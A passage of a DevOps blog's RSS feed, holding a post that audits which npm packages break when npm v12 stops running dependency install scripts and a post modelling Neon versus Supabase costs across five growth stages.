          data-heading-id="h2-where-this-leaves-the-terraform-comparison"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>We keep a longer <a href="https://devops-daily.com/posts/opentofu-2026-switch-from-terraform">OpenTofu vs Terraform migration guide</a> that covers licensing and ecosystem, so just the delta here: 1.11 brought ephemeral values and the <code>enabled</code> meta-argument, and 1.12 adds config-driven forgetting, dynamic destroy protection, and lock files that maintain themselves. The pattern across the last two releases is consistent: OpenTofu is spending its development budget on the unglamorous state-and-lifecycle operations that fill real teams&#39; runbooks, and the fork stopped being a drop-in clone a while ago.</p>
<p>If you adopt one thing from 1.12 this quarter, make it <code>destroy = false</code> on the resources your team currently protects with tribal knowledge and a pinned Slack message. State surgery through code review beats state surgery through terminal history every time someone new joins the on-call rotation.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[npm v12 Will Stop Running Install Scripts. We Audited Our Repos to See What Actually Breaks]]></title>
      <link>https://devops-daily.com/posts/npm-v12-install-scripts-audit</link>
      <description><![CDATA[Starting with npm v12 (estimated July 2026), dependency install scripts will not run unless you allowlist them. We ran the new audit tooling on our own production repos: 65 packages flagged, 4 that matter, and a surprising amount of nothing breaking.]]></description>
      <pubDate>Fri, 12 Jun 2026 14:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/npm-v12-install-scripts-audit</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[npm]]></category><category><![CDATA[supply-chain]]></category><category><![CDATA[security]]></category><category><![CDATA[ci-cd]]></category><category><![CDATA[nodejs]]></category>
      <content:encoded><![CDATA[<p>On June 9, GitHub <a href="https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/">announced the breaking changes coming in npm v12</a>, estimated to ship in July 2026. The headline change: <code>npm install</code> will no longer execute <code>preinstall</code>, <code>install</code>, or <code>postinstall</code> scripts from your dependencies unless you have explicitly approved them. Not as an option you can turn on. As the default, for everyone.</p>
<p>If you have followed the npm worm coverage on this site over the past months (<a href="https://devops-daily.com/posts/tanstack-npm-worm-dead-mans-switch">TanStack</a>, <a href="https://devops-daily.com/posts/mini-shai-hulud-pytorch-lightning-supply-chain-attack">PyTorch Lightning&#39;s mini Shai-Hulud</a>, <a href="https://devops-daily.com/posts/axios-supply-chain-attack-what-happened-and-what-to-do">axios</a>, <a href="https://devops-daily.com/posts/antv-npm-shai-hulud-wave-may-2026">the AntV wave</a>), you already know why. Every one of those campaigns used the same beachhead: a script that runs automatically, with your credentials, the moment you install a package. GitHub calls lifecycle scripts the single largest code-execution surface in the npm ecosystem, and after the June 1 Red Hat compromise shipped credential stealers with valid SLSA provenance, the argument for keeping that surface open by default ran out.</p>
<p>So instead of writing about the policy, we did the thing you should do this week: upgraded npm and ran the new audit tooling against our own production repositories. Here is what v12 will actually do to a real Next.js application and a couple of TypeScript tooling repos, including the part where much less breaks than the audit output suggests.</p>
<h2 id="h2-what-changes-exactly" class="group relative scroll-mt-24">
        <a href="#h2-what-changes-exactly" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What changes, exactly
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-changes-exactly"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Three defaults flip in v12:</p>
<ol>
<li><strong>Dependency lifecycle scripts stop running.</strong> <code>preinstall</code>, <code>install</code>, and <code>postinstall</code> from dependencies are skipped unless the package is on your project&#39;s allowlist. This includes implicit builds: a package with a <code>binding.gyp</code> and no declared install script still gets blocked, because npm runs an implicit <code>node-gyp rebuild</code> for it. <code>prepare</code> scripts from git, file, and link dependencies are covered too.</li>
<li><strong>Git dependencies need <code>--allow-git</code>.</strong> Direct or transitive git dependencies stop resolving without the flag. This closes an ugly hole: a git dependency&#39;s <code>.npmrc</code> could override which git executable npm invokes, which meant code execution even under <code>--ignore-scripts</code>.</li>
<li><strong>Remote URL dependencies need <code>--allow-remote</code>.</strong> Tarballs pulled from HTTPS URLs stop resolving without explicit opt-in. <code>file:</code> and directory dependencies keep their current behavior.</li>
</ol>
<p>Your own project&#39;s scripts still run. If your root <code>package.json</code> has a <code>postinstall</code> that runs <code>patch-package</code>, or a <code>prepare</code> that installs husky hooks, nothing changes for you. The allowlist is about code arriving from the registry, and it lives in your <code>package.json</code>, which means script approvals show up in pull requests and get reviewed like any other change.</p>
<p>All of this is already available as warnings in npm 11.16.0 and later, which is what makes the audit possible before July.</p>
<h2 id="h2-the-audit-65-warnings-4-that-matter" class="group relative scroll-mt-24">
        <a href="#h2-the-audit-65-warnings-4-that-matter" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The audit: 65 warnings, 4 that matter
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-audit-65-warnings-4-that-matter"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>We ran <code>npm approve-scripts --allow-scripts-pending</code> (npm 11.17.0) against this site, a production Next.js application with a fairly typical dependency tree. The output flags 65 packages with lifecycle scripts not yet covered by an allowlist. Out of context, that number reads like a migration project.</p>
<p>It is not, and the breakdown shows why:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;65 packages flagged in our Next.js repo, by script type&quot;,&quot;unit&quot;:&quot; pkgs&quot;,&quot;caption&quot;:&quot;Output of npm approve-scripts --allow-scripts-pending on a production Next.js app, June 2026.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;prepare (husky, npm run build, ...)&quot;,&quot;value&quot;:61,&quot;series&quot;:&quot;noise&quot;},{&quot;label&quot;:&quot;install (sharp)&quot;,&quot;value&quot;:1,&quot;series&quot;:&quot;real&quot;},{&quot;label&quot;:&quot;postinstall (esbuild x2, unrs-resolver)&quot;,&quot;value&quot;:3,&quot;series&quot;:&quot;real&quot;}],&quot;series&quot;:[{&quot;name&quot;:&quot;noise&quot;,&quot;color&quot;:&quot;#64748b&quot;},{&quot;name&quot;:&quot;real&quot;,&quot;color&quot;:&quot;#f59e0b&quot;}]}"></div><p>Sixty-one of the sixty-five are <code>prepare</code> scripts: husky hook installation, <code>npm run build</code>, the usual library housekeeping. <code>prepare</code> only executes when you install a package from git, a local file, or a link, never from a normal registry install. Unless you are pinning one of those packages to a git ref, these entries are inert. The audit lists them because it cannot know you will not switch a dependency to a git URL tomorrow, but for triage purposes you can put them at the bottom of the pile.</p>
<p>That leaves four entries that run today on every clean install of this repo: <code>sharp</code> (image processing, used by Next.js image optimization), <code>esbuild</code> twice at different versions, and <code>unrs-resolver</code>. All native code. These are the ones that could break a build in July.</p>
<p>Two smaller repos made the point even more cleanly: our open source <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">benchmark harness</a> and its dashboard each flagged exactly one package. Both times it was esbuild.</p>
<h2 id="h2-the-plot-twist-we-denied-them-and-nothing-broke" class="group relative scroll-mt-24">
        <a href="#h2-the-plot-twist-we-denied-them-and-nothing-broke" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The plot twist: we denied them and nothing broke
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-plot-twist-we-denied-them-and-nothing-broke"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part worth the price of admission. We installed <code>sharp</code> and <code>esbuild</code> into a clean project with scripts disabled, then exercised both:</p>
<ul>
<li><code>sharp</code> created and encoded an image without its <code>install</code> script ever running.</li>
<li><code>esbuild</code> transformed TypeScript without its <code>postinstall</code>.</li>
</ul>
<p>No failures, no missing binaries. The reason: both packages migrated their native binary distribution to <code>optionalDependencies</code> (<code>@img/sharp-linux-arm64</code>, <code>@esbuild/linux-arm64</code>, and their platform siblings), which are plain packages that install without any script execution. The lifecycle scripts that the audit flags are validation and fallback paths for platforms without a prebuilt binary, not the primary delivery mechanism.</p>
<p>This is the quiet story behind npm v12: the ecosystem&#39;s most depended-on native packages already left install scripts behind, in large part because the worm era made every install-time hook a liability. The default flip in July is less a demolition and more the locking of a door most serious packages already stopped using.</p>
<h2 id="h2-what-will-actually-break" class="group relative scroll-mt-24">
        <a href="#h2-what-will-actually-break" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What will actually break
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-will-actually-break"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>That does not make the change free. The breakage concentrates in specific places, and they are worth checking deliberately:</p>
<ul>
<li><strong>Long-tail native modules built with node-gyp.</strong> Anything that compiles C++ on install and has not moved to prebuilt binaries stops working until allowlisted, including packages with only an implicit <code>binding.gyp</code> build. Older database drivers, hardware bindings, and that one image library from 2019 live here.</li>
<li><strong>Downloaders.</strong> Packages whose <code>postinstall</code> fetches something big: Puppeteer and Playwright pulling browsers, Cypress pulling its binary. Denied scripts mean the tool installs but fails at runtime with a missing executable, which is a worse failure mode than failing at install.</li>
<li><strong>Git and URL dependencies.</strong> Any <code>&quot;some-fork&quot;: &quot;github:org/repo#branch&quot;</code> in your tree needs <code>--allow-git</code> in every CI job and Dockerfile that installs it. Private tarball URLs need <code>--allow-remote</code>. These fail loudly at resolve time, so you will notice, but you will notice in the middle of an incident if your first v12 install happens during one.</li>
<li><strong>CI images that float npm versions.</strong> If your Dockerfile does <code>npm install -g npm@latest</code> or your CI uses a <code>node:latest</code> style tag, v12 arrives on its schedule, not yours.</li>
</ul>
<h2 id="h2-the-checklist" class="group relative scroll-mt-24">
        <a href="#h2-the-checklist" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The checklist
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-checklist"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The whole audit took us under fifteen minutes for three repos. Doing it now means July is a non-event:</p>
<ol>
<li>Upgrade to npm 11.16.0 or later somewhere representative (a dev machine is fine, CI is better).</li>
<li>Run <code>npm approve-scripts --allow-scripts-pending</code> in each repo. Ignore the <code>prepare</code> entries from registry packages on the first pass.</li>
<li>For each real <code>install</code>/<code>postinstall</code> entry, decide: approve it with <code>npm approve-scripts &lt;pkg&gt;</code>, or test whether the package works without it (as with sharp and esbuild above, the answer is increasingly yes) and deny it with <code>npm deny-scripts &lt;pkg&gt;</code>.</li>
<li>Commit the resulting allowlist in <code>package.json</code>. From now on, a new dependency wanting script execution shows up in code review instead of executing silently.</li>
<li>Grep your Dockerfiles and CI for git and URL dependencies, and add the flags where genuinely needed.</li>
<li>Pin your npm major version in CI images, and schedule the v12 upgrade like any other dependency upgrade instead of receiving it as a surprise.</li>
</ol>
<p>One honest caveat: July 2026 is GitHub&#39;s estimate, and details of partially shipped behavior have moved before (the git restriction landed in 11.10, remote URLs in 11.15, the full allowlist tooling in 11.16). The direction is not in question, though. Install-time code execution from the registry is ending as a default, three years of worms made the case, and the audit that tells you whether you care takes less time than reading this post did.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase Pricing: What the Same App Costs From Launch to Scale]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-scaling-costs</link>
      <description><![CDATA[We priced one application through five growth stages on both platforms using verified June 2026 list prices. The result is three distinct cost regimes, two crossover points, and a surprise: at scale the biggest line item is not the database.]]></description>
      <pubDate>Thu, 11 Jun 2026 18:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-vs-supabase-scaling-costs</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[postgres]]></category><category><![CDATA[neon]]></category><category><![CDATA[supabase]]></category><category><![CDATA[databases]]></category><category><![CDATA[pricing]]></category><category><![CDATA[finops]]></category>
      <content:encoded><![CDATA[<p>Pricing pages answer the question &quot;what does a unit cost&quot;. They are conspicuously silent on the question you actually have: &quot;what will my application cost in a year, when it has real users?&quot; The honest answer depends on workload shape, and workload shape changes as you grow, which is why the same two platforms can each be the cheap option at different points in the same product&#39;s life.</p>
<p>This is part three of our Neon vs Supabase series (<a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">free tiers</a>, <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">operational benchmarks</a>). Instead of benchmarking operations, we built a cost model: one application, five growth stages, priced on Neon Launch and Supabase Pro using list prices we verified against both pricing pages this week. The model is <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">open source in the same repo</a> as the benchmarks (<code>npm run costs</code>), every price carries its source, and you can change the workload assumptions and rerun it for your own product.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>There are <strong>three cost regimes, not one winner</strong>: Neon wins early (scale-to-zero means a quiet app costs almost nothing), Supabase wins the middle (a flat fee beats usage billing once the database runs hot but small), and Neon wins at scale by a wide margin.</li>
<li>The two <strong>crossover points</strong> sit roughly where your app stops sleeping (Supabase becomes competitive) and where your user count passes Supabase&#39;s included 100k monthly active users (Supabase stops being competitive, fast).</li>
<li>The scale-stage surprise: on Supabase, <strong>the database is not the bill</strong>. Metered auth MAU is. Our scale stage prices at $1,213/month on Supabase Pro, of which $975 is MAU overage; the same stage on Neon Launch is $278, because Neon Auth carries no per-MAU meter up to 1M users.</li>
<li>This comparison assumes you use each platform&#39;s bundled auth. If you bring your own auth provider, the picture changes substantially in Supabase&#39;s favor, and we show you where.</li>
</ul>
<h2 id="h2-the-application-and-its-growth" class="group relative scroll-mt-24">
        <a href="#h2-the-application-and-its-growth" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The application and its growth
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-application-and-its-growth"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The model prices one hypothetical B2B SaaS through five stages, with the workload dimensions both platforms bill on: average compute demand, how much of the month the database is actually active, database size, monthly active users on auth, preview branches created by CI, and egress.</p>
<table>
<thead>
<tr>
<th>Stage</th>
<th>Compute (avg)</th>
<th>Active time</th>
<th>DB size</th>
<th>MAU</th>
<th>Branches/mo</th>
<th>Egress</th>
</tr>
</thead>
<tbody><tr>
<td>Launch month</td>
<td>0.25 CU</td>
<td>20%</td>
<td>1 GB</td>
<td>500</td>
<td>10</td>
<td>5 GB</td>
</tr>
<tr>
<td>First customers</td>
<td>0.25 CU</td>
<td>45%</td>
<td>5 GB</td>
<td>5k</td>
<td>30</td>
<td>25 GB</td>
</tr>
<tr>
<td>Product-market fit</td>
<td>0.5 CU</td>
<td>75%</td>
<td>20 GB</td>
<td>30k</td>
<td>60</td>
<td>100 GB</td>
</tr>
<tr>
<td>Growth</td>
<td>1 CU</td>
<td>95%</td>
<td>60 GB</td>
<td>120k</td>
<td>120</td>
<td>400 GB</td>
</tr>
<tr>
<td>Scale</td>
<td>2 CU</td>
<td>100%</td>
<td>200 GB</td>
<td>400k</td>
<td>200</td>
<td>1.5 TB</td>
</tr>
</tbody></table>
<p>Disagree with the assumptions? Good: they are parameters, not conclusions. Clone the repo, edit the scenario, rerun. The shape of the findings survives reasonable changes to the numbers; your exact crossover points will differ.</p>
<h2 id="h2-the-curves" class="group relative scroll-mt-24">
        <a href="#h2-the-curves" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The curves
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-curves"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;line&quot;,&quot;title&quot;:&quot;Monthly cost of the same application as it grows&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List prices June 2026, verified against both pricing pages. Model and assumptions are open source; rerun with your own workload.&quot;,&quot;x&quot;:[&quot;launch month&quot;,&quot;first customers&quot;,&quot;product-market fit&quot;,&quot;growth&quot;,&quot;scale&quot;],&quot;series&quot;:[{&quot;name&quot;:&quot;Neon (Launch)&quot;,&quot;color&quot;:&quot;#10b981&quot;,&quot;data&quot;:[5.28,15.23,48.74,119.95,277.76]},{&quot;name&quot;:&quot;Supabase (Pro)&quot;,&quot;color&quot;:&quot;#38bdf8&quot;,&quot;data&quot;:[25.54,27.42,32.95,127.94,1213.39]}]}"></div><p><strong>Regime one, the quiet months.</strong> At launch, Neon costs $5 to Supabase&#39;s $26. Nothing clever: Supabase Pro is a $25 flat fee plus always-on compute, while Neon bills compute only when the database is awake, and an early-stage app sleeps most of the month. If you are pre-revenue, this gap is your hosting budget.</p>
<p><strong>Regime two, the flat-fee window.</strong> By product-market fit the picture inverts: Supabase $33, Neon $49. The database now runs three-quarters of the month, so scale-to-zero stops paying, while Supabase&#39;s fixed fee covers a Small instance running around the clock with most usage inside included quotas. This is the regime Supabase&#39;s pricing is designed for, and in it, the design works. The growth stage is nearly a tie ($128 vs $120), which is itself useful information: between roughly 30k and 120k users, price should not be the deciding factor at all; pick on the <a href="https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks">operational differences</a> instead.</p>
<p><strong>Regime three, the meters.</strong> At scale the curves split violently: $278 on Neon, $1,213 on Supabase. To see why, look at where the Supabase dollars go:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Where the money goes at the scale stage (Supabase Pro, $1213.39/mo total)&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;The database is not the bill. Metered monthly active users on auth dominate once you pass the included 100k.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Pro base (per org)&quot;,&quot;value&quot;:25,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;compute (medium, 24/7, after $10 credits)&quot;,&quot;value&quot;:50.01,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;storage beyond 8 GB included&quot;,&quot;value&quot;:24,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;MAU beyond 100,000 included&quot;,&quot;value&quot;:975,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;200 preview branches (10h each, no credits…&quot;,&quot;value&quot;:26.88,&quot;series&quot;:&quot;Supabase&quot;},{&quot;label&quot;:&quot;egress beyond 250 GB included&quot;,&quot;value&quot;:112.5,&quot;series&quot;:&quot;Supabase&quot;}]}"></div><h2 id="h2-the-mau-surprise" class="group relative scroll-mt-24">
        <a href="#h2-the-mau-surprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The MAU surprise
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-mau-surprise"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>That chart is the article. At 400k monthly active users, the compute (a Medium instance, $50 after credits) and even 200 GB of storage ($24) are rounding errors next to <strong>$975 of MAU overage</strong>: Supabase Auth includes 100k monthly active users on Pro and bills $0.00325 for each one beyond. Auth, the feature that felt free when you started, becomes 80% of the bill precisely when your product succeeds.</p>
<p>Neon&#39;s side has no equivalent meter: Neon Auth (in beta) carries no per-MAU billing up to one million users on the paid plans, so the scale stage is honest compute and storage: $155 + $70 + $53 of always-active database, branches included.</p>
<p>Now the fairness flip, because this cuts both ways: <strong>the comparison above assumes you use the bundled auth.</strong> Plenty of teams run Clerk, Auth0, WorkOS, or their own auth regardless of database, and at 400k MAU those run hundreds to thousands of dollars a month on their own. If you bring your own auth, delete the MAU line from the Supabase column, and the scale stage becomes roughly $238 vs $278: a near-tie that Supabase arguably wins. The platform decision and the auth decision are one decision wearing two coats; make them together.</p>
<h2 id="h2-what-the-model-deliberately-leaves-out" class="group relative scroll-mt-24">
        <a href="#h2-what-the-model-deliberately-leaves-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the model deliberately leaves out
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-the-model-deliberately-leaves-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li><strong>The PITR add-on</strong> ($100/month on Supabase per 7-day window): add it if sub-minute recovery is a requirement; part two explains what you get on each platform without it.</li>
<li><strong>Replacement costs for the rest of the bundle</strong>: if you would otherwise pay for storage, realtime, or edge functions separately, Supabase&#39;s flat fee is buying more than a database. Neon announced its own storage and functions in June 2026, but they have not shipped.</li>
<li><strong>Committed-use and enterprise discounts</strong>, support tiers, and the Team/Scale tiers above these plans: that comparison is coming later in this series.</li>
<li><strong>Egress shape</strong>: we model it linearly; a media-heavy product will not be linear, and Supabase&#39;s $0.09/GB beyond 250 GB deserves your own modeling if that is you.</li>
</ul>
<h2 id="h2-how-to-actually-use-this" class="group relative scroll-mt-24">
        <a href="#h2-how-to-actually-use-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to actually use this
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-how-to-actually-use-this"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ol>
<li>Find your regime. Mostly-idle side project or pre-launch: Neon by default. Steady small production app, happy inside included quotas: Supabase&#39;s flat fee is genuinely good value. Past 100k MAU on bundled auth: do the math before the bill does it for you.</li>
<li>Watch the crossovers, not the platforms. The first crossover arrives when your database stops sleeping; the second when your user count crosses the included-MAU line. Both are visible in your own metrics months before they hit the invoice.</li>
<li>Decide auth and database together. The single biggest line in this entire analysis is an auth meter on a database platform.</li>
</ol>
<p>Every price in the model links to its source and was verified against both pricing pages in June 2026 (prices change; the <a href="https://github.com/The-DevOps-Daily/serverless-postgres-benchmarks">repo</a> holds the dated record). Like the benchmarks, the model is open source and contributions are welcome: if a price moved or an assumption looks wrong, open an issue or PR and we will rerun the curves. The <a href="https://postgres-benchmarks.devops-daily.com/">live dashboard</a> carries the measured performance data this series is built on, our <a href="https://devops-daily.com/comparisons/neon-vs-supabase">full Neon vs Supabase comparison</a> lays out the architecture and feature differences side by side, and part four will close the series with something nobody has benchmarked properly yet: what it costs in AI agent tokens to build the same application on each platform.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon vs Supabase in Production: We Benchmarked the Operations That Page You at 3am]]></title>
      <link>https://devops-daily.com/posts/neon-vs-supabase-operational-benchmarks</link>
